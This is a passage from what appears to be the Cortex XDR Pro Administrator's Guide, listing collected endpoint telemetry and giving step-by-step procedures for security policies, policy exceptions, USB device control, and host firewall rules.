© 2020 Palo Alto Networks, Inc.
 Path Provider Event IDs Description
Approved and Certificate issued
(4887), Denied request (4888)

Security 4720, 4722, New User Account Created(4720),

4725, 4726 User Account Enabled (4722),
User Account Disabled (4725),
User Account Deleted (4726)

Security 4624 Network logon events

Security 4880, 4881, CA Service Stopped (4880),

4896, 4898 CA Service Started (4881), CA
DB row(s) deleted (4896), CA
Template loaded (4898)

Security 4634 Logoff events - for Network

Logon events

Security 6272, 6280 RRAS events – only generated on

Microsoft IAS server

Security 4689 Process Terminate (4689)

Security 4648, 4776 Local credential authentication

events (4776), Logon with explicit
credentials (4648)

Additional Endpoint Data Collected for Mac Endpoints

Category Events Attributes

Files • Create • Full path of the modified file

• Write before and after modification
• Delete • SHA256 and MD5 hash for
• Rename the file after modification
• Move
• Open

Process • Start • Process ID (PID) of the parent

• Stop process
• PID of the process
• Full path
• Command line arguments
• Integrity level to determine
if the process is running with
elevated privileges
• Hash (SHA256 and MD5)

132 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Category Events Attributes
• Signature or signing certificate
details

Network • Accept • Source IP address and port

• Connect • Destination IP address and
• Connect Failure port
• Disconnect • Failed connection
• Listen • Protocol (TCP/UDP)
• Statistics • Aggregated send/receive
statistics for the connection

Additional Endpoint Data Collected for Linux Endpoints

Category Events Attributes

Files • Create • Full path of the file

• Open • Hash of the file
• Write
• Delete For specific files
only and only
if the file was
written.

• Copy • Full paths of both the original

• Move (rename) and the modified files

• Change owner (chown) • Full path of the file

• Change mode (chmod) • Newly set owner/attributes

Network • Listen • Source IP address and port for

• Accept explicit binds
• Connect • Destination IP address and
• Connect failure port
• Disconnect • Failed TCP connections
• Protocol (TCP/UDP)

Process • Start • PID of the child process

• PID of the parent process
• Full image path of the process
• Command line of the process
• Hash of the image (SHA256 &
MD5)

• Stop • PID of the stopped process

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 133

© 2020 Palo Alto Networks, Inc.
Apply Security Profiles to Endpoints
Cortex XDR provides out-of-the-box protection for all registered endpoints with a default security policy
customized for each supported platform type. To tune your security policy, you customize settings in a
security profile and attach the profile to a policy. Each policy that you create must apply to one or more
endpoints or endpoint groups.

STEP 1 | From Cortex XDR, create a policy rule.

Do either of the following:
• Select Endpoints > Policy Management > Policy Rules > + New Policy to begin a rule from scratch.
• Select Endpoints > Policy Management > Profiles, right-click the profile you want to assign and
Create a new policy rule using this profile.

STEP 2 | Define a Policy Name and optional Description that describes the purpose or intent of the
policy.

STEP 3 | Select the Platform for which you want to create a new policy.

STEP 4 | Select the desired Exploit, Malware, Restrictions, and Agent Settings profiles you want to
apply in this policy.

If you do not specify a profile, the Cortex XDR agent uses the default profile.

STEP 5 | Click Next.

STEP 6 | Use the filters to assign the policy to one or more endpoints or endpoint groups.
Cortex XDR automatically applies a filter for the platform you selected. To change the platform, go Back
to the general policy settings.

STEP 7 | Click Done.

STEP 8 | In the Policy Rules table, change the rule position, if needed, to order the policy relative to
other policies.

134 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
The Cortex XDR agent evaluates policies from top to bottom. When the Cortex XDR agent finds the first
match it applies that policy as the active policy. To move the rule, select the arrows and drag the policy
to the desired location in the policy hierarchy.

Right-click to View Policy Details, Edit, Save as New, Disable, and Delete.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 135

© 2020 Palo Alto Networks, Inc.
Exceptions Security Profiles
To allow full granularity, Cortex XDR allows you to create exceptions from your baseline policy. These
exceptions allow you to remove specific folders or paths from exemption or disable specific security
modules. In Cortex XDR, you can configure the following types of policy exceptions:

Exception Type Description

Process exceptions Define an exception for a specific process for one

or more security modules.

Support exceptions Import an exception from the Cortex XDR Support

team.

Behavioral Threat Protection Rule Exception An exception disabling a specific BTP rule across
all processes.

Digital Signer Exception (Windows only) An exception adding a digital

signer to the list of allowed signers.

Java Deserialization Exception (Linux only) An exception allowing specific Java

executable (jar, class).

Local File Threat Examination Exception (Linux only) An exception allowing specific PHP
files.

There are two types of exceptions you can create:

• Policy exceptions that apply to specific policies and endpoints (see Add a New Exceptions Security
Profile)
• Global exceptions that apply to all policies (see Add a Global Endpoint Policy Exception)
To help you manage and asses your BIOC/IOC rules, Cortex XDR automatically creates a System
Generated rule exception if the same BIOC/IOC rule is detected by the same initiator hash within a 3 day
timeframe on 100 different endpoints.
Each time a BIOC/IOC alert is detected, the 3 day timeframe begins counting down. If after 3 days without
an alert, the 3 day timeframe is reset. For example:

Day Number BIOC/IOC Detections Action

Example A

1 98 Detections No exception created

2 1 Detection No exception created

4 1 Detection System Generated exception

created

Example B

136 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Day Number BIOC/IOC Detections Action

1 98 Detections No exception created

2 1 Detection No exception created

6 99 Detections No exception created since

detections were not within the 3
day timeframe

Add a New Exceptions Security Profile

You can configure exceptions that apply to specific groups of endpoints or you can Add a Global Endpoint
Policy Exception. Use the following workflow to create an endpoint-specific exception:

STEP 1 | Add a new profile.

1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Exceptions as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.

1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the exceptions profile.

To configure a Process Exception:
1. Select the operating system.
2. Enter the name of the process.
3. Select one or more Endpoint Protection Modules that will allow this process to run. The modules
displayed on the list are the modules relevant to the operating system defined for this profile. To
apply the process exception on all security modules, Select all. To apply the process exception on all
exploit security modules, select Disable Injection.
4. Click the adjacent arrow.
5. After you’ve added all processes, click Create.
You can return to the Process Exception profile from the Endpoints Profile page at any point and edit
the settings, for example if you want to add or remove more security modules.
To configure a Support Exception:
1. Import the json file you received from Palo Alto Networks support team by either browsing for it in
your files or by dragging and dropping the file on the page.
2. Click Create.
To configure module specific exceptions relevant for the selected profile platform:
• Behavioral Threat Protection Rule Exception—When you view an alert for a Behavioral Threat
event which you want to allow in your network from now on, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform and Rule name). Select Exception Scope:
Profile and select the exception profile name. Click Add.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 137

© 2020 Palo Alto Networks, Inc.
 • Local Analysis Rules Exception—When you view an alert for a Local Analysis event triggered by
rules which you want to allow in your network from now on, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform and Rule names). Select Exception Scope:
Profile and select the exception profile name. The exception allows all the rules that triggered the
alert, and you cannot choose to allow only specific rules within the alert. Click Add.
• Digital Signer Exception—When you view an alert for a Digital Signer Restriction which you want
to allow in your network from now on, right-click the alert and Create alert exception. Cortex XDR
displays the alert data (Platform, Signer, and Generating Alert ID). Select Exception Scope: Profile and
select the exception profile name. Click Add.
• Java Deserialization Exception—When you identify a Suspicious Input Deserialization alert that
you believe to be benign and want to suppress future alerts, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform, Process, Java executable, and Generating
Alert ID). Select Exception Scope: Profile and select the exception profile name. Click Add.
• Local File Threat Examination Exception—When you view an alert for a PHP file which you want
to allow in your network from now on, right-click the alert and Create alert exception. Cortex XDR
displays the alert data (Process, Path, and Hash). Select Exception Scope: Profile and select the
exception profile name. Click Add
At any point, you can click the Generating Alert ID to return to the original alert from which the
exception was originated. You cannot edit module specific exceptions.

STEP 4 | Apply Security Profiles to Endpoints.

If you want to remove an exceptions profile from your network, go to the Profiles page, right-click and
select Delete

Add a Global Endpoint Policy Exception

As an alternative to adding an endpoint-specific exception in policy rules, you can define and manage global
exceptions that apply across all of your endpoints. On the Global Exception page, you can manage all the
global exceptions in your organization for all platforms. Together with Exceptions Security Profiles, global
exceptions constitute the sum of all the exceptions allowed within your security policy rules.
• Add a Global Process Exception

138 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 • Add a Global Support Exception
• Add a Global Behavioral Threat Protection Rule Exception
•
• Review Advanced Analysis Exceptions
• Add a Global Digital Signer Exception
• Add a Global Java Deserialization Exception

Add a Global Process Exception

STEP 1 | Go to Endpoints > Policy Management > Policy Exceptions.

STEP 2 | Select Process exceptions.

1. Select the operating system.
2. Enter the name of the process.
3. Select one or more Endpoint Protection Modules that will allow this process to run. The modules
displayed on the list are the modules relevant to the operating system defined for this profile. To
apply the process exception on all security modules, Select all. To apply the process exception on all
exploit security modules, select Disable Injection. Click the adjacent arrow to add the exception.

STEP 3 | After you add all exceptions, Save your changes.

The new process exception is added to the Global Exceptions in your network and will be applied across
all rules and policies. To edit the exception, select it and click the edit icon. To delete it, select it and click
the delete icon.

Add a Global Support Exception

STEP 1 | Go to Endpoints > Policy Management > Policy Exceptions.

STEP 2 | Select Support exceptions.

Import the json file you received from Palo Alto Networks support team by either browsing for it in
your files or by dragging and dropping the file on the page.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 139

© 2020 Palo Alto Networks, Inc.
STEP 3 | Click Save.
The new support exception is added to the Global Exceptions in your network and will be applied across
all rules and policies.

Add a Global Behavioral Threat Protection Rule Exception

When you view a Behavioral Threat alert in the Alerts table for which you want to allow across your
organization, you can create a Global Exception for that rule.

STEP 1 | Right-click the alert and select Create alert exception.

STEP 2 | Review the alert data (platform and rule name) and select Exception Scope: Global.

140 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 3 | Click Add.
The relevant BTP exception is added to the Global Exceptions in your network and will be applied across
all rules and policies. At any point, you can click the Generating Alert ID to return to the original alert
from which the exception was originated. To delete a specific global exception, select it and click X. You
cannot edit global exceptions generated from a BTP security event.

Add A Global Local Analysis Rules Exception

When you view in the Alerts table a Local Analysis alert that was triggered as a result of local analysis rules,
you can create a Global Exception to allow these rules across your organization.

STEP 1 | Right-click the alert and select Create alert exception.

STEP 2 | Review the alert data (platform and rule name) and select Exception Scope: Global.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 141

© 2020 Palo Alto Networks, Inc.
STEP 3 | Click Add.
The relevant Local Analysis Rules exception is added to the Global Exceptions in your network and will
be applied across all rules and policies. The exception allows all the rules that triggered the alert, and you
cannot choose to allow only specific rules within the alert. At any point, you can click the Generating
Alert ID to return to the original alert from which the exception was originated. To delete a specific
global exception, select it and click X. You cannot edit global exceptions generated from a local analysis
security event.

Review Advanced Analysis Exceptions

With Advanced Analysis, Cortex XDR can provide a secondary validation of XDR Agent alerts raised by
exploit protection modules. To perform the additional analysis, Cortex XDR analyzes alert data sent by the
Cortex XDR agent. If Advanced Analysis indicates an alert is actually benign, Cortex XDR can automatically
create exceptions and distribute the updated security policy to your endpoints.
By enabling Cortex XDR to automatically create and distribute global exceptions you can minimize
disruption for users when they subsequently encounter the same benign activity. To enable the automatic
creation of Advanced Analysis Exceptions, configure the Advanced Analysis options in your Configure
Global Agent Settings.
For each exception, Cortex XDR displays the affected platform, exception name, and the relevant alert
ID for which Cortex XDR determined activity was benign. To drill down into the alert details, click the
Generating Alert ID.

Add a Global Digital Signer Exception

STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Platform, signer, and alert ID) and select Exception Scope: Global.

142 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 2 | Click Add.
The relevant digital signer exception is added to the Global Exceptions in your network and will be
applied across all rules and policies. At any point, you can click the Generating Alert ID to return to the
original alert from which the exception was originated. To delete a specific global exception, select it and
click X. You cannot edit global exceptions generated from a digital signer restriction security event.

Add a Global Java Deserialization Exception

STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Platform, Process, Java executable, and alert ID) and select Exception Scope:
Global.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 143

© 2020 Palo Alto Networks, Inc.
STEP 2 | Click Add.
The relevant digital signer exception is added to the Global Exceptions in your network and will be
applied across all rules and policies. At any point, you can click the Generating Alert ID to return to the
original alert from which the exception was originated. To delete a specific global exception, select it and
click X. You cannot edit global exceptions generated from a digital signer restriction security event.

Add a Global Local File Threat Examination Exception

STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Process, Path, and Hash) and select Exception Scope: Global.

144 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 2 | Click Add.
The relevant PHP file is added to the Global Exceptions in your network and will be applied across
all rules and policies. At any point, you can click the Generating Alert ID to return to the original alert
from which the exception was originated. To delete a specific global exception, select it and click X.
You cannot edit global exceptions generated from a local file threat examination exception restriction
security event.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 145

© 2020 Palo Alto Networks, Inc.
Hardened Endpoint Security
Cortex XDR enables you to extend the security on your endpoints beyond the Cortex XDR agent built-
in prevention capabilities to provide an increased coverage of network security within your organization.
By leveraging existing mechanisms and added capabilities, the Cortex XDR agent can enforce additional
protections on your endpoints to provide a comprehensive security posture. Cortex XDR provides the
following hardened endpoint security capabilities:
• Device Control
• Host Firewall
• Disk Encryption
• Host Inventory
• Vulnerability Assessment
The following table describes for each capability the supported platforms and minimal agent version. A dash
(—) indicates the setting is not supported.

Hardened endpoint security capabilities are not supported for Android endpoints.

Module Windows Mac Linux

Device Control —
Protects endpoints from Cortex XDR agent Cortex XDR agent
loading malicious files from 7.0 and later 7.2 and later
USB-connected removable
For VDI, Cortex XDR
devices (CD-ROM, disk drives,
agent 7.3 and later
floppy disks and Windows
portable devices drives).

Host Firewall —
Protects endpoints from Cortex XDR agent Cortex XDR agent
attacks originating in network 7.1 and later 7.2 and later
communications to and from
the endpoint.

Disk Encryption —
Provides visibility into Cortex XDR agent Cortex XDR agent
endpoints that encrypt their 7.1 and later 7.2 and later
hard drives using BitLocker or
FileVault.

Host Inventory
Provides full visibility into the Cortex XDR agent Cortex XDR agent Cortex XDR agent
business and IT operational 7.1 and later 7.1 and later 7.1 and later
data on all your endpoints.

Vulnerability Assessment —
Identifies and quantifies the Cortex XDR agent Cortex XDR agent
security vulnerabilities (CVEs) 7.1 and later 7.1 and later

146 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Module Windows Mac Linux
that exist for applications
installed on you endpoints.

Device Control
By default, all external USB devices are allowed to connect to your Cortex XDR endpoints. To protect
endpoints from connecting USB-connected removable devices—such as disk drives, CD-ROM drives,
floppy disk drives, and other portable devices—that can contain malicious files, Cortex XDR provides device
control.
For example, with device control, you can:
• Block all supported USB-connected devices for an endpoint group.
• Block a USB device type but add to your allow list a specific vendor from that list that will be accessible
from the endpoint.
• Temporarily block only some USB device types on an endpoint.
The following are prerequisites to enforce device control policy rules on your endpoints:

Platform Requirements and Limitations

Windows Cortex XDR agent 7.0 or a later release.

For VDI—
• Cortex XDR agent 7.3 or a later release.
• Virtual environments leverage different stacks that might not be subject to
the Device Control policy rules that are enforced by the Cortex XDR agent
and, therefore, could lead to USB devices that are allowed to connect to
the VDI instance in contrast to the configured policy rules.
• The Cortex XDR agent provides best-effort enforcement of the Device
Control policy rules on VDI instances that are running on physical
endpoints where a Cortex XDR agent is not deployed.
• For Citrix Virtual Apps and Desktops, Cortex XDR Device Control is
supported on generic virtual channels only.
• For VMWare Horizon, you must disable Sharing > Allow access to
removable storage in your VMWare horizon client settings.

Mac Cortex XDR agent 7.2 or a later release.

Linux Not supported.

Device control rules take effect on your endpoint only after the Cortex XDR agent deploys
the policy. If you already had a USB device connected to the endpoint, you have to
disconnect it and connect it again for the policy to take effect.

Device Control Profiles

To apply device control in your organization, you define device control profiles that determine which device
types Cortex XDR blocks and which it permits. There are two types of profiles:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 147

© 2020 Palo Alto Networks, Inc.
 Profile Description

Configuration Profile Allow or block these USB-connected device type

groups:
• Disk Drives
• CD-Rom Drives
• Floppy Disk Drives
• (Windows only) Windows Portable Devices

Cortex XDR relies on the device

class assigned by the operating
system.

Add a New Configuration Profile.

The Cortex XDR agent relies on the device class
assigned by the operating system. For Windows
endpoints only, you can configure additional
device classes.
Add a Custom Device Class

Exceptions Profile Allow specific devices according to device types

and vendor. You can further specify a specific
product and/or product serial number.
Add a New Exceptions Profile.

Device Configuration and Device Exceptions profiles are set for each operating system separately. After
you configure a device control profile, Apply Device Control Profiles to Your Endpoints.

Add a New Configuration Profile

STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy management > Extension Profiles and select + New Profile. Select Platform
and click Device Configuration > Next.

STEP 2 | Fill in the General Information.

Assign the profile Name and add an optional Description. The profile Type and Platform are set by
Cortex XDR.

STEP 3 | Configure the Device Configuration.

For each group of device types, select whether to Allow or Block them on the endpoints. For Disk
Drives only, you can also choose to allow to connect in Read-only mode. To use the default option
defined by Palo Alto Networks, leave Use Default selected.

Currently, the default is set to Use Default (Allow) however Palo Alto Networks may
change the default definition at any time.

STEP 4 | Save your profile.

When you’re done, Create your device profile definitions.
If needed, you can edit, delete, or duplicate your profiles.

148 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 You cannot edit or delete the default profiles pre-defined in Cortex XDR.

STEP 5 | (Optional) To define exceptions to your Device Configuration profile, Add a New Exceptions
Profile.

STEP 6 | Apply Device Control Profiles to Your Endpoints.

Add a New Exceptions Profile

STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy management > Extension Profiles and select + New Profile. Select Platform
and click Device Exceptions > Next

STEP 2 | Fill in the General Information.

Assign the profile Name and add an optional Description. The profile Type and Platform are set by the
system.

STEP 3 | Configure Device Exceptions.

You can add devices to your allow list according to different sets of identifiers-vendor, product, and
serial numbers.
• (Disk Drives only) Permission—Select the permissions you want to grant: Read only or Read/Write.
• Type—Select the Device Type you want to add to the allow list (Disk Drives, CD-Rom, Portable, or
Floppy Disk).
• Vendor—Select a specific vendor from the list or enter the vendor ID in hexadecimal code.
• (Optional) Product—Select a specific product (filtered by the selected vendor) to add to your allow
list, or add your product ID in hexadecimal code.
• (Optional) Serial Number—Enter a specific serial number (pertaining to the selected product) to add
to your allow list. Only devices with this serial number are included in the allow list.

STEP 4 | Save your profile.

When you’re done, Create your device exceptions profile.
If needed, you can later edit, delete, or duplicate your profiles.

You cannot edit or delete the predefined profiles in Cortex XDR.

STEP 5 | Apply Device Control Profiles to Your Endpoints.

Apply Device Control Profiles to Your Endpoints

After you defined the required profiles for Device Configuration and Exceptions, you must configure
Device Control Policies and enforce them on your endpoints. Cortex XDR applies Device Control policies
on endpoints from top to bottom, as you’ve ordered them on the page. The first policy that matches the
endpoint is applied. If no policies match, the default policy that enables all devices is applied.

STEP 1 | Log in to Cortex XDR.

Go to Endpoints > Policy management > Extension Policy Rules and select + New Policy.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 149

© 2020 Palo Alto Networks, Inc.
STEP 2 | Configure settings for the Device Control policy.
1. Assign a policy name and select the platform. You can add a description.
The platform will automatically be assigned to Windows.
2. Assign the Device Type profile you want to use in this rule.
3. If desired, assign an Device Exceptions profile.
4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.

STEP 3 | Configure policy hierarchy.

Drag and drop the policies in the desired order of execution. The default policy that enables all devices
on all endpoints is always the last one on the page and is applied to endpoints that don’t match the
criteria in the other policies.

STEP 4 | Save the policy hierarchy.

After the policy is saved and applied to the agents, Cortex XDR enforces the device control policies on
your environment.

STEP 5 | (Optional) Manage your policy rules.

In the Protection Policy Rules table: you can view and edit the policy you created and the policy
hierarchy.
1. View your policy hierarchy.
2. Right-click to View Policy Details, Edit, Save as New, Disable, and Delete.

STEP 6 | Monitor device control violations.

After you apply Device Control rules in your environment, use the Endpoints > Device Control
Violations page to monitor all instances where end users attempted to connect restricted USB-
connected devices and Cortex XDR blocked them on the endpoint. All violation logs are displayed on the
page. You can sort the results, and use the filters menu to narrow down the results. For each violation
event Cortex XDR logs the event details, the platform, and the device details that are available.
If you see a violation for which you’d like to define an exception on the device that triggered it, right-
click the violation and select one of the following options:
• Add device to permanent exceptions—To ensure this device is always allowed in your network,
select this option to add the device to the Device Permanent Exceptions list.
• Add device to temporary exceptions—To allow this device only temporarily on the selected endpoint
or on all endpoints, select this option and set the allowed time frame for the device.
• Allow device to a profile exception—Select this option to allow the device within an existing Device
Exceptions profile.

STEP 7 | Tune your device control exceptions.

To better deploy device control in your network and allow further granularity, you can add devices on
your network to your allow list and grant them access to your endpoints. Device control exceptions are
configured per device and you must select the device category, vendor, and type of permission that
you want to allow on the endpoint. Optionally, to limit the exception to a specific device, you can also
include the product and/or serial number.
Cortex XDR enables you to configure the following exceptions:

150 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Exception Name Description

Permanent Exceptions Permanent exceptions approve the device in your network

across all Device Control policies and profiles. You can
create them directly from the violation event that blocked
the device, or through the Permanent Exceptions list.

Permanent exceptions apply across

platforms, allowing the deceives on all
operating systems.

Create a Permanent Exception.

Temporary Exceptions Temporary exceptions approve the device for a specific time
period up to 30 days. You create a temporary exception
directly from the violation event that blocked the device.
Create a Temporary Exception.

Profile Exceptions Profile exceptions approve the device in an existing

exceptions profile. You create a profile exception directly
from the violation event that blocked the device.
Create a Profile Exception.

1. Create a Permanent Exception.

Permanent device control exceptions are managed in the Permanent Exception list and are applied to
all devices regardless of the endpoint platform.
• If you know in advance which device you’d like to allow throughout your network, create a
general exception from the list:
1. Go to Endpoints > Policy Management > Extensions and select Device Permanent Exceptions
on the left menu. The list of existing Permanent Exceptions is displayed.
2. Select: Type, Permission, and Vendor.
3. (Optional) Select a specific product and/or enter a specific serial number for the device.
4. Click the adjacent arrow and Save. The exception is added to the Permanent Exceptions list
and will be applied in the next heartbeat.
• Otherwise, you can create a permanent exception directly from the violation event that blocked
the device in your network:
1. On the Device Control Violations page, right-click the violation event triggered by the device
you want to permanently allow.
2. Select Add device to permanent exceptions. Review the exception data and change the
defaults if necessary.
3. Click Save.
2. Create a Temporary Exception.
1. On the Device Control Violations page, right-click the violation event triggered by the device you
want to temporarily allow.
2. Select Add device to temporary exceptions. Review the exception data and change the defaults if
necessary. For example, you can configure the exception to this endpoint only or to all endpoints
in your network, or set which device identifiers will be included in the exception.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 151

© 2020 Palo Alto Networks, Inc.
 3. Configure the exception TIME FRAME by defining the number of days or number of hours during
which the exception will be applied, up to 30 days.
4. Click Save. The exception is added to the Device Temporary Exceptions list and will be applied in
the next heartbeat.
3. Create an Exception within a Profile.
1. On the Device Control Violations page, right-click the violation event triggered by the device you
want to add to a Device Exceptions profile.
2. Select the PROFILE from the list.
3. Click Save. The exception is added to the Exceptions Profile and will be applied in the next
heartbeat.

Add a Custom Device Class

(Windows only) You can include custom USB-connected device classes beyond Disk Drive, CD-ROM,
Windows Portable Devices and Floppy Disk Drives, such as USB connected network adapters. When
you create a custom device class, you must supply Cortex XDR the official ClassGuid identifier used by
Microsoft. Alternatively, if you configured a GUID value to a specific USB connected device, you must
use this value for the new device class. After you add a custom device class, you can view it in Device
Management and enforce any device control rules and exceptions on this device class.
To create a custom USB-connected device class:

STEP 1 | Go to Endpoints > Policy Management > Settings > Device Management.
This is the list of all your custom USB-connected devices.

STEP 2 | Create the new device class.

Select +New Device. Set a Name for the new device class, supply a valid and unique GUID Identifier.
For each GUID value you can define one class type only.

152 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 3 | Save.
The new device class is now available in Cortex XDR as all other device classes.

Host Firewall
The Cortex XDR host firewall enables you to control communications on your endpoints. To use the host
firewall, you set rules that allow or block the traffic on the devices and apply them to your endpoints using
Cortex XDR host firewall policy rules. Additionally, you can configure different sets of rules based on the
current location of your endpoints - within or outside your organization network. The Cortex XDR host
firewall rules leverage the operating system firewall APIs and enforce them on your endpoints only, they do
not update your Windows or Mac firewall settings.
The following are prerequisites to apply Cortex XDR host firewall policy rules on your endpoints:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 153

© 2020 Palo Alto Networks, Inc.
 Platform Requirements and Limitations

Windows • Cortex XDR agent 7.1 or a later release.

• Cortex XDR host firewall rules can apply to both incoming and outgoing
communication on the endpoint.

Mac • Cortex XDR agent 7.2 or a later release.

• Cortex XDR Host Firewall is not supported on endpoints running macOS
11.0 and later releases.
• Cortex XDR host firewall rules can apply only to incoming communication
on the endpoint.
• After you disable or remove the Cortex XDR host-firewall policy on the
endpoint, the system firewall on the endpoint is disabled.
• You cannot configure the following Mac host firewall settings with the
Cortex XDR host firewall:
• Automatically allow built-in software to receive
incoming connections.
• Automatically allow downloaded signed software to
receive incoming connections.

Linux Not supported.

To configure the Cortex XDR host firewall in your network, follow this high-level workflow:
• Enable Network Location Configuration
• Add a New Host Firewall Profile
• Apply Host Firewall Profiles to Your Endpoints
• Monitor the Host Firewall Activity on your Endpoint

Enable Network Location Configuration

If you want to apply location based host firewall rules, you must first enable network location configuration
in your Agent Settings Profile.
When enabled, Cortex XDR performs the following to determine the endpoint location:
1. A domain controller (DC) connectivity test to check whether the device is connected to the internal
network or not. If the device has access to LDAP://rootDSE then it is in the organization. Otherwise, if
the DC test failed or returned an external domain, Cortex XDR proceeds to a DNS connectivity test.
2. In the DNS test, the Cortex XDR agent submits a DNS name that is known only to the internal network.
If the DNS returned the pre-configured internal IP, then the device is within the organization. Otherwise,
if the DNS IP cannot be resolved, then the device is located outside.
In every heartbeat, and if the Cortex XDR agent detects a network change on the endpoint, the agent
triggers the device location test and re-calculates the policy according to the new location.

Add a New Host Firewall Profile

STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy Management > Extensions Profiles and select + New Profile. Select the
Platform and click Host Firewall > Next

154 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 2 | Fill-in the general information for the new profile.
• Assign a name and an optional description to the profile.
• By default, host firewall profile rules are based on the current location of your device. Configure
two sets of rules: a set of External Rules that apply when the device is located outside the internal
organization network, and a set of Internal Rules that apply when the device is located within the
internal organization network. If you disable the Location Based option, your policy will apply the
internal set of rules only, and that will be applied to the device regardless of its location.

STEP 3 | Create host firewall rules.

For Windows:
Click +New Rule. A host firewall rule allows or blocks the communication to and/or from a Windows
endpoint. You can fine tune the rule by applying the action to the following parameters:

• Action—Select whether to Allow or Block the communication on the endpoint.

• Specific IPs and Ports—(Optional) Configure the rule for specific local or remote IPs and/or Ports.
You can also set a range of IP addresses.
• Direction—Select the direction of the communication this rule applies to:
• Inbound—Communication to the endpoint.
• Outbound—Communication from the endpoint.
• Both—The rule applies to both inbound and outbound communication.
• Protocol—(Optional) Select a specific protocol you want this rule to apply to.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 155

© 2020 Palo Alto Networks, Inc.
 • Path—(Optional) Enter the full path and name of a program you want the rule to apply to. If you use
system variables in the path definition, you must re-enforce the policy on the endpoint every time the
directories and/or system variables on the endpoint change.
If the profile is location based, you can define both internal and external rules. You can also copy a rule
from one set to another.
For Mac:

1. Enable Host Firewall Management.

Enable this option to allow Cortex XDR to manage the host firewall on your Mac endpoints.
2. Configure the host firewall internal and external settings.
The host firewall settings allow or block inbound communication on your Mac endpoints. You can
fine tune the rule by applying the action to the following parameters:
• Enable stealth mode—Hide your mac endpoint from all TCP and UDP networks by enabling the
Apple Stealth mode on your endpoint.
• Block all incoming connections—Select where to block all incoming communications on the
endpoint or not.
• Application exclusions—Allow or block specific programs running on the endpoint using Apple
BundleID.
If the profile is location based, you can define both internal and external settings.

156 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 4 | Save your profile.
When you’re done, Create your host firewall profile.

STEP 5 | Apply Host Firewall Profiles to Your Endpoints.

Apply Host Firewall Profiles to Your Endpoints

After you defined the required host firewall profiles, you must configure the Protection Policies and enforce
them on your endpoints. Cortex XDR applies Protection policies on endpoints from top to bottom, as you’ve
ordered them on the page. The first policy that matches the endpoint is applied. If no policies match, the
default policy that enables all communication to and form the endpoint is applied.

STEP 1 | Log in to Cortex XDR.

Go to Endpoints > Policy Management > Extensions Policy Rules > +New Policy.

STEP 2 | Configure settings for the host firewall policy.

1. Assign a policy name and optional description.
The platform will automatically be assigned to Windows.
2. Assign the host firewall profile you want to use in this rule.
3. If desired, assign Device Configuration and/or Device Exceptions and or Host Firewall profiles. If
none are assigned, the default profiles will be applied.
4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.
Alternatively, you can associate the host firewall profile to an existing policy. Right-click the policy and
select Edit. Select the Host Firewall profile and click Next. If needed, you can edit other settings in the
rule (such as target endpoints, description, etc.) When you’re done, click Done

STEP 3 | Configure policy hierarchy.

Drag and drop the policies in the desired order of execution.

STEP 4 | Save the policy hierarchy.

After the policy is saved and applied to the agents, Cortex XDR enforces the host firewall policies on
your environment.

Monitor the Host Firewall Activity on your Endpoint

